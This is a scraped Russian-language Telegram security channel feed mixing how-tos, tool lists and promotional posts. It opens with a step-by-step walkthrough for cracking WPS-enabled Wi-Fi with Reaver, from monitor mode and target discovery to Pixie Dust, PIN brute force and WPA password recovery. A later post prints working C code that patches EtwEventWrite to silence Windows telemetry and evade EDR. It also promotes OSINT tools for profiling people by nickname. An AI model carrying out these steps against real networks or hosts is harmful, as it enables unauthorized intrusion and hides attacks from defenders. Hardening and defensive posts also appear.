CodeGuard: CyberSec Edition

🔐 АТАКУЕМ WI-FI C WPS ПРИ ИСПОЛЬЗОВАНИИ REAVER — Практический гайд

«~» WPS — это удобная настройка Wi‑Fi по кнопке или пину, которая сильно упрощает жизнь пользователю, но делает сеть уязвимой для перебора. В статье по ссылке говорится как правильно провести этот самый перебор. Делюсь своим опытом, как я организовывал подобную атаку по данному материалу

🤩 Шаг 1. Готовим карту и систему: Нам понадобится карта с режимом монитора и инъекциями (Atheros часто ведёт себя лучше всего с Reaver) — Отключаем всё лишнее:

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

— Смотрим интерфейс:

sudo iw dev

— Переводим wlan0 в монитор‑режим:

sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up

🔍 Шаг 2. Ищем точки с включённым WPS: Для разведки возьмем wash (идёт в комплекте с Reaver)

sudo wash -i wlan0

— Ждем пару минут и смотрим колонки: 🎥 BSSID – MAC точки 🎥 Ch – канал 🎥 WPS – версия WPS 🎥 Lck – блокировка WPS (No — интересует, Yes — можно пройти мимо) 🎥 ESSID – имя сети (Для атаки подойдут только те, у кого Lck = No) 💀 Шаг 3. Проверим Pixie Dust через Reaver: Если точка уязвима к Pixie Dust, PIN можно вытащить почти сразу, без долгого онлайнового перебора — Берем BSSID из вывода wash, например:

EE:43:F6:CF:C3:08

— Запускаем проверку:

sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -K

— Если роутер уязвим, Reaver покажет PIN вида:

WPS pin: 36158805

(На этом этапе у нас есть PIN, но все ещё нет WPA‑пароля) 👾 Шаг 4. Полный перебор WPS PIN, если Pixie не зашёл: Если Pixie Dust не сработал и PIN’ы не подошли, остаётся классический перебор:

sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -vv

— Ключи -v/-vv/-vvv увеличивают подробность вывода и помогают понять, на чём всё ломается >> За счёт уязвимости протокола WPS реальное пространство перебора — всего около 11 000 комбинаций, а не десятки миллионов, поэтому это задача на пару часов для опытных спецов 🤲 Шаг 5. Если у нас уже есть PIN, то достаем WPA‑пароль: Если PIN уже известен, можно попросить Reaver вытащить WPA‑пароль напрямую:

sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805 -vv

— В успешном сценарии на выходе получаю строку с PSK: это и есть пароль от Wi‑Fi 🛡 Как наоборот защититься от атак? >> С точки зрения защиты единственный надёжный шаг, это отключить WPS с PIN в настройках роутера. Если производитель позволяет, плюсом включить блокировку WPS 😈 CodeGuard: PySec Edition | Чат

👾 «Реагирование на инциденты и управление рисками безопасности»: Практический курс про то, как работать с реальными инцидентами — Разработан под тех, кто хочет уметь не только ловить алерты, но и разруливать последствия для бизнеса, даже когда ресурсов и людей минимум 🌐 Что разберёте на курсе:

— Как выстраивать процесс реагирования от обнаружения атаки и разбора логов до ликвидации и пост‑анализа — Как работать с киберрисками: выявлять активы и уязвимости, оценивать влияние инцидента на бизнес, выбирать, какие риски можно реально снижать, а какие наоборот осознанно принимать — Как использовать open source‑инструменты и простые практики, когда SIEM за миллионы не завезли, а инциденты уже есть

💡 Также приятно то, что упор сделан на реальные кейсы и разбор типовых факапов: ошибки в коммуникации, неправильную приоритизацию, отсутствие плана IRP и документации — все то, что в жизни ломается куда чаще, чем сами технологии. ➡️ Забрать курс 😈 CodeGuard: PySec Edition | Чат

Держите 6 хороших каналов по искусственному интеллекту и нейросетям для любого уровня. Можешь выбрать сам: 🤖 AI — @ai_prompt 📱 Нейросети — @neuro_prompt 📱 Python — @python_prompt 🤔 InfoSec — @infosec_prompt 👩‍💻 IT Новости — @it_news 😄 IT Мемы — @it_memes Обучение, правильные промпты, разборы и полезные ресурсы на каждую тему!

Готовлю новый канал CodeGuard: Academy Сижу над ним потно, чтобы там было прям годнота для своих. Поддержи подпиской: тебе секунда, а мне мотивация пилить контент. 👉 https://t.me/+XI5KQ-XdAow3YWMy 😈 CodeGuard: PySec Edition | Чат

🧠 «Социальная инженерия и этичный хакинг на практике» Джо Грея — это практический мануал по тому, как этично закрывать дырки в процессах безопасности

Книга показывает, почему даже идеально настроенный периметр бессилен, если сотрудники сами выдают доступы, кликают по ссылкам и доверяют админам по телефону

🌟 Что внутри книги? — Психология атак: какие триггеры используют социнженеры и как из них собираются сценарии фишинга — Практический OSINT и подготовка атак, как по открытым источникам собрать досье на компанию и людей — Этичный пентест людей: структуры фишинговых кампаний + рекомендации, как результаты таких тестов превращать в обучение 💡 Чем так хороша эта книга? >> Она является хорошим мостом между технарями и человеческим периметром. После прочтения книги проще объяснить бизнесу, почему защиты от людей нужны не меньше, чем новый firewall 📕 Ссылка на книгу как всегда в нашем архиве — [ARCHIVE] 😈 CodeGuard: PySec Edition | Чат

⚠️ Git: мини-шпаргалка по жизненному циклу изменений 1️⃣ Working Directory: Здесь правите файлы, запускаете тесты и ломаете всё, что можно —git add: нужен, чтобы перенести выбранные изменения в подготовительную область 2️⃣ Staging: Снимок того, что пойдёт в следующий коммит —git commit: зафиксировать содержимое staging в локальном репозитории 3️⃣ Local Repository: История всех ваших коммитов на машине —git push: отправить локальные коммиты на сервер —git fetch: забрать новые коммиты с сервера без слияния —git pull – fetch + авто‑слияние в текущую ветку 5️⃣ Stash: Когда нужно убрать со стола, но ещё рано коммитить — git stash: спрятать незакоммиченные изменения — git stash apply: вернуть изменения, не очищая stash — git stash pop: вернуть и одновременно удалить запись из stash 5️⃣ Remote Repository — Общий репо проекта на GitHub / GitLab / Bitbucket, куда пушит вся команда 😈 CodeGuard: PySec Edition | Чат

🥷 Стажировки и вакансии по ИБ и OSINT - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @jobs_ib Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.

🔐 Практика: как руками проверить и подкрутить безопасные протоколы связи

«~» Теорию про знает каждый второй, а вот тех, кто реально открывал конфиг и бил по нему в разы меньше. Подготовил для вас практический чек-лист, который подойдет к любому серверу

1️⃣ Проверяем TLS: что торчит наружу — Быстрый скан протоколов и шифров:

nmap --script ssl-enum-ciphers -p 443 example.com

В выводе смотрим: 🎥 Отключены ли SSLv2/3 и старые TLS 1.0/1.1 🎥 Нет ли древних шифров вроде 3DES/RC4 🎥 Используется ли современный TLS 1.2/1.3 с AES‑GCM или CHACHA20 2️⃣ Смотрим сертификат через openssl

echo QUIT | openssl s_client -connect example.com:443 2>/dev/null \
  | openssl x509 -noout -issuer -dates -subject

— Проверяем кто выдал сертификат, не истёк ли он и корректен ли subject/сан‑имена. Полезно для быстрой диагностики и проверки сторонних сервисов без GUI 3️⃣ Жёстко настраиваем SSH, акцентируем внимание на ключи и современные шифры — Резервная копия и правка конфига:

sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo nano /etc/ssh/sshd_config

Базовый набор, который стоит включить почти везде:

Protocol 2
PasswordAuthentication no
PermitRootLogin no
ClientAliveInterval 300
ClientAliveCountMax 2

После изменений:

sudo systemctl restart sshd

— Так вы режете логин по паролю, прямой root и вешаете таймаут на вечные зависшие сессии После такого цикла безопасность протоколов начинает ощущаться как осязаемый набор рычагов, за которые можно дёргать самому, пользуемся 😎 😈 CodeGuard: PySec Edition | Чат

🤩 Подборка лучших GitHub-репозиториев для ИБ-специалистов

1) Raccoon — Высокопроизводительный сканер для рекогносцировки: с DNS, портами, веб‑фингерпринтингом, всё в одном CLI 2) BlueTeam-Tools — Собрание инструментов для blue team: мониторинг, лог‑анализ, форензика, DLP, сетевые сенсоры и т.п. 3) Awesome Annual Security Reports — Годовые отчёты по угрозам, инцидентам и трендам от разных компаний 4) OSSEC — Хостовый IDS с мониторингом логов, файловой системой, rootkit‑чекером, алертамм по правилам 5) SafeLine — Высокопроизводительный прокси с встроенным WAF: защита HTTP‑трафика, правила, дашборд, удобный деплой в Docker/K8s. 6) ZAP — Прокси‑сканер приложений: пассивный и активный поиск уязвимостей, фуззинг, API для автоматизации 7) Radare2 и Cutter — Radare 2 это CLI‑фреймворк для анализа бинарей и памяти. Вместе с GUI‑фронтендом Cutter покрывает большую часть задач реверса и отладки 8) Cuckoo Sandbox — Песочница для автоматического запуска подозрительных образцов, имеет настройку поведения, сетевого трафика, артефактов в системе 9) AutoRecon — Фреймворк, который запускает цепочку проверок и раскладывает результаты по папкам 10) pcileech — Инструменты для работы через PCIe/DMA (dump/patch RAM, обход аутентификации и т.п.)

😈 CodeGuard: PySec Edition | Чат

Айтишников в 2025 году больше, чем цыган. И каждый, естественно, хочет быть видным сеньором, свою геймдев-студию, 15.000€ зэпэшечку и больше никогда не выходить на рабочие созвоны. И как быть новичку сегодня? Или айтишнику, решившему сменить сферу деятельности. Бери менторство по ИБ. Кибербезопасность сейчас на подъеме, поэтому даже для ITшника это будет сильное конкурентное преимущество и спидран на буст навыков с нуля. ➦ От корки до корки узнаешь индустрию. Кто много платит и ищет специалистов, какие есть направления. ➦ Получишь все хард и софт скиллы для работы в нише. ➦ Заимеешь переговорные навыки и научишься писать идеальные резюме. Даже если ты уже работаешь в киберсеке, но чувствуешь, что нуждаешься в левел-апе — ю а вэлком. А еще у нас для тебя есть разовые консультации и помощь в составлении резюме. Почитай подробности: https://t.me/+_F4FzzaOTQk2N2Qy

🤨 Burp Suite за 1 час: из хаоса вкладок в рабочий инструмент

«•» После просмотра этого видео Burp перестанет выглядеть как страшная панель с сотней кнопок и превратится в понятный рабочий инструмент

 🗒 В уроке автор спокойно проходит весь путь работы с ним: — Разбор настройки прокси — Перехват и правка HTTP‑запросов — Наглядная работа с Repeater и Intruder — Обучение поиску уязвимостей на тестовом приложении ➕ Отдельный плюс — автор делает упор на реальные приёмы: где смотреть параметры, как быстро гонять payload’ы и на что обращать внимание при тестировании веб‑приложений 📎 Смотрим и закрепляем свои знания *здесь* 😈 CodeGuard: PySec Edition | Чат

⚠️ Taranis AI — инструмент, превращающий OSINT‑поток в осмысленную ленту, а не в свалку ссылок

—> Веб-движок умеет сам ходить по сайтам и другим открытым источникам, собирать новости и статьи, прогонять их через NLP и вытаскивать из текста сущности и ключевые факты

🔇 Что делает Taranis AI: 1) Агрегирует сырые OSINT‑события в единую ленту 2) Нормализует и обогащает контент через NER, дедупликацию, выделение важных сигналов 3) Поддерживает совместную работу команд и обмен историями через MISP 🔑 Taranis AI отлично подходит как ядро OSINT‑процесса для blue‑team: он берёт на себя рутину сбора и первичной обработки, а аналитик тратит время только на интерпретацию и принятие решений 😈 CodeGuard: PySec Edition | Чат

Изоляция рунета ближе, чем ты думаешь

Loading … ██████████████] 99%

Роскомнадзору дали карт-бланш на блокировки, а «белые списки» сайтов тестируют уже в десятках регионов. И гайки будут закручиваться только сильнее. Чтобы в одночасье не лишиться доступа к свободному Интернету, просто сохрани Only Hack. Тут профессиональный хакер делится фишками, с которыми доступ к глобальной сети у тебя будет даже в случае ядерного апокалипсиса. Не жди момента «Х». Перестрахуйся подпиской.

💻 Smap — тихий сканер портов на базе Shodan

«~» Обычно Nmap сам ломится к целям в дверь, smap же делает все аккуратнее. Он берёт уже готовые данные у Shodan и собирает по ним картину открытых портов и сервисов, без всяких SYN‑флудов

🔑 ЧТО ОН УМЕЕТ? 1. Drop‑in замена Nmap — Принимает те же ключи -p, -o*, -iL, -h и выдаёт выход в привычных форматах (-oX, -oG, -oN, -oA) 2. До 200 хостов/сек без сканирования сети — По факту мы лишь дергаем бесплатный Shodan API, а Smap отвечает скоростью и не светит ваш IP 3. Версии сервисов и уязвимости — Smap подтягивает баннеры, версии и связанные CVE/теги. В формате -oS можно увидеть уязвимости и метки Shodan 🥸 Помимо nmap‑форматов у него есть и свои:

-oP — список IP:PORT построчно для пайплайнов и других тулов -oJ — JSON -oS — фирменный Smap‑формат с тегами и уязвимостями

⭐️ Ставим Smap себе здесь 😈 CodeGuard: PySec Edition | Чат

👁 Статья от Solar про «ETW‑patching и WinAPI‑hooking»: рассказываем, как атакующие вырывают глаза защитным системам — В последнее время атакующие в поиске полного отключения телеметрии долезли чуть ли не до до патчинга ETW и перехвата системных вызовов вплоть до уровня ядра, разберем как они вообще это делают 🖤 Как малварь вообще выключает телеметрию? —> Идея на удивление простая: вместо того чтобы чистить логи, злоумышленник рубит сам кран с событиями. В user‑mode это делается патчем функции EtwEventWrite в ntdll и в итоге АБСОЛЮТНО ВСЁ, что должно было улететь в ETW от приложений, просто перестаёт отправляться:

void *EtwEventWritep = GetProcAddress(LoadLibraryA("ntdll"), "EtwEventWrite"); // указатель на  EtwEventWrite()

VirtualProtect(EtwEventWritep, 1, PAGE_EXECUTE_READWRITE, &lastprot); // добавить права на запись к странице памяти

mchar patch[] = { 0xc3 }; // пропатчить первой инструкцией ret
memcpy(EtwEventWritep, patch, 1);

💀 PS: После такого патча .NET‑инъекция в notepad.exe продолжает работать, но события Microsoft‑Windows‑DotNETRuntime в PerfView исчезают. User‑mode‑провайдеры молчат, остаются только ядреные 🔪 Обход user‑mode провайдеров vs kernel‑mode — Есть одно большое НО: патч выше глушит только user‑mode‑ETW для конкретного процесса, что ломает телеметрию множества провайдеров, но поток от kernel‑mode‑провайдеров всё ещё жив и его так просто не выключить, тут нужен доступ к памяти ядра ⚠️ WinAPI‑hooking: атакующий играет в ту же игру, что и EDR — Часть защитных решений получают телеметрию через перехват WinAPI/ntdll‑функций: в начало функции вставляют трамплин, который сначала отдаёт управление EDR, а уже потом коду Атакующий может сделать зеркальную штуку: 🎥 Подменить пролог интересующей функции 🎥 Менять аргументы, скрывать свои действия или вовсе не звать оригинал Фактически, обе стороны дерутся за контроль над одной и той же точкой: кто первым поставит hook, тот и определяет, какую картинку увидит система мониторинга 🗒 😈 CodeGuard: PySec Edition | Чат

👩‍💻 IT и Технологии теперь в Карточках! Да-да, сильнейшие разработчики создали свой канал, в котором сделали карточки на ВСЕ темы IT. Помимо карточек, найдешь тонну курсов и полезного материала 📄 Ничего искать не нужно, все в Telegram: @techvibe

Годный инструмент для OSINT по никам с гео‑надстройкой 😍

«•» Snoop — это OSINT‑комбайн по никам, у которого геолокация идёт как отдельный модуль поверх основного функционала

💀 Основная фича Snoop — поиск человека по нику и сбор связанной с ним информации из открытых источников — Дополнительно можно вытащить геокоординаты из текста и доменов и уже потом визуализировать всё это на карте ☣️ Что умеет по гео — Методы: GEO_IP, парсинг Яндекс‑карт, reverse‑geocoder и др. — Вывод: отчёты в CSV, TXT, HTML, что удобно для последующего анализа или подгрузки в свои пайплайны 👽 Практическое использование в ИБ — OSINT‑разведка по целям йй — Подпитка внутренней аналитики: выгружаем CSV/HTML, скармливаем SIEM/своим йтулзетам — Визуализация активности на карте при расследованиях ⭐️ Ссылка на гитхаб как всегда тут — [тык] 😈 CodeGuard: PySec Edition | Чат

👁️ Создание анонимного рабочего окружения на Linux + Tor

«~» Tor‑браузер сам по себе анонимности не даёт, для этого нужен отдельный боевой контур, состоящий из хоста, изолированного ВМ и Tor-шлюза, разберем эту схему подробнее

🔍 Общая схема окружения: 1️⃣ Хост‑Linux — минимальный и максимально защищенный, нам нужен только гипервизор и базовые утилиты 2️⃣ Tor‑шлюз — ВМ, где крутится Tor и фаервол, а наружу ходит только Tor 3️⃣ Рабочая ВМ — отдельный Linux‑десктоп, который видит только Tor‑шлюз и ничего больше 🤓 Таким образом мы делим риски, теперь взлом рабочей ВМ не раскрывает реальный IP и не даёт доступа к хосту, разберем эту модель подробнее: 🥸 Создаем защищенный хост — Установливаем Debian/Ubuntu/Fedora с полным дисковым шифрованием, при установке выбираем «Зашифровать весь диск» — Затем выполняем харднинг хоста

sudo apt update && sudo apt upgrade -y
sudo apt install -y qemu-kvm virt-manager \
                    ufw apparmor apparmor-utils

— Далее отключаем автологин и лишние сервисы. Включаем UFW и закрываем всё, кроме SSH/VPN при необходимости:

sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw enable

👩‍💻 Создаем отдельную ВМ для выхода в сеть: тут есть два варианта, не парится и использовать Whonix Gateway или сделать его самому (ну естественно мы выберем второе 🤪) — Устанавливаем Tor в отдельной ВМ:

sudo apt update && sudo apt install -y tor iptables-persistent

— Базовый torrc (фрагмент):

SocksPort 9050
TransPort 9040
DNSPort 5353
AutomapHostsOnResolve 1
VirtualAddrNetworkIPv4 10.192.0.0/10

Пояснение: TransPort/DNSPort нужны, чтобы рабочая ВМ не знала о Tor и просто ходила в интернет — iptables на шлюзе:

sudo iptables -F
sudo iptables -t nat -F

sudo iptables -t nat -A PREROUTING -i eth1 -p tcp \ # Всё с интерфейса внутренней сети -> Tor
  -j REDIRECT --to-ports 9040
sudo iptables -t nat -A PREROUTING -i eth1 -p udp --dport 53 \
  -j REDIRECT --to-ports 5353

sudo iptables -A FORWARD -i eth1 -j DROP # Запрет прямого выхода в интернет с eth1

Пояснение: Рабочая ВМ видит только шлюз, а любые попытки идти мимо Tor дропаются фаерволом на gateway 🤩 Рабочая ВМ: то место, где вы будете жить — Лёгкий десктоп Linux (Debian/XFCE и т.п.)

sudo apt install -y xfce4 lightdm

Пояснение: подключаем её к внутренней сети или виртуальному свитчу, чтобы единственный маршрут наружу вёл на Tor‑шлюз — Установка Tor Browser внутри рабочей ВМ

wget https://www.torproject.org/dist/torbrowser/linux/tor-browser-linux-x86_64.tar.xz
tar xf tor-browser-linux-*.tar.xz
./tor-browser/Browser/start-tor-browser

⚠️ Базовые правила OPSEC внутри ВМ 1) Не логиниться в реальные Google/Telegram/рабочую почту из этого контура, а иначе Tor превращается просто в прокси 2) Для разных задач использовать отдельные Tor‑серкиты и профили 3) Все скачанные файлы открывать либо оффлайн, либо в отдельной анализ‑ВМ без доступа в сеть 😈 CodeGuard: PySec Edition | Чат

👩‍💻 Всем программистам посвящается! Вот 16 авторских обучающих IT каналов по самым востребованным областям программирования: Выбирай своё направление: 👩‍💻 Python — t.me/python_ready 🤔 InfoSec & Хакинг — t.me/hacking_ready 🖥 SQL & Базы Данных — t.me/sql_ready 🤖 Нейросети — t.me/neuro_ready 👩‍💻 C/C++ — https://t.me/cpp_ready 👩‍💻 C# & Unity — t.me/csharp_ready 👩‍💻 Java — t.me/java_ready 👩‍💻 IT Новости — t.me/it_ready 👩‍💻 Linux — t.me/linux_ready 🖼️ DevOps — t.me/devops_ready 👩‍💻 Frontend — t.me/frontend_ready 📱 JavaScript — t.me/javascript_ready 📖 IT Книги — t.me/books_ready 🐞 QA-тестирование — t.me/qa_ready 🖥 Data Science — t.me/data_ready 🖥 Design — t.me/design_ready 📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!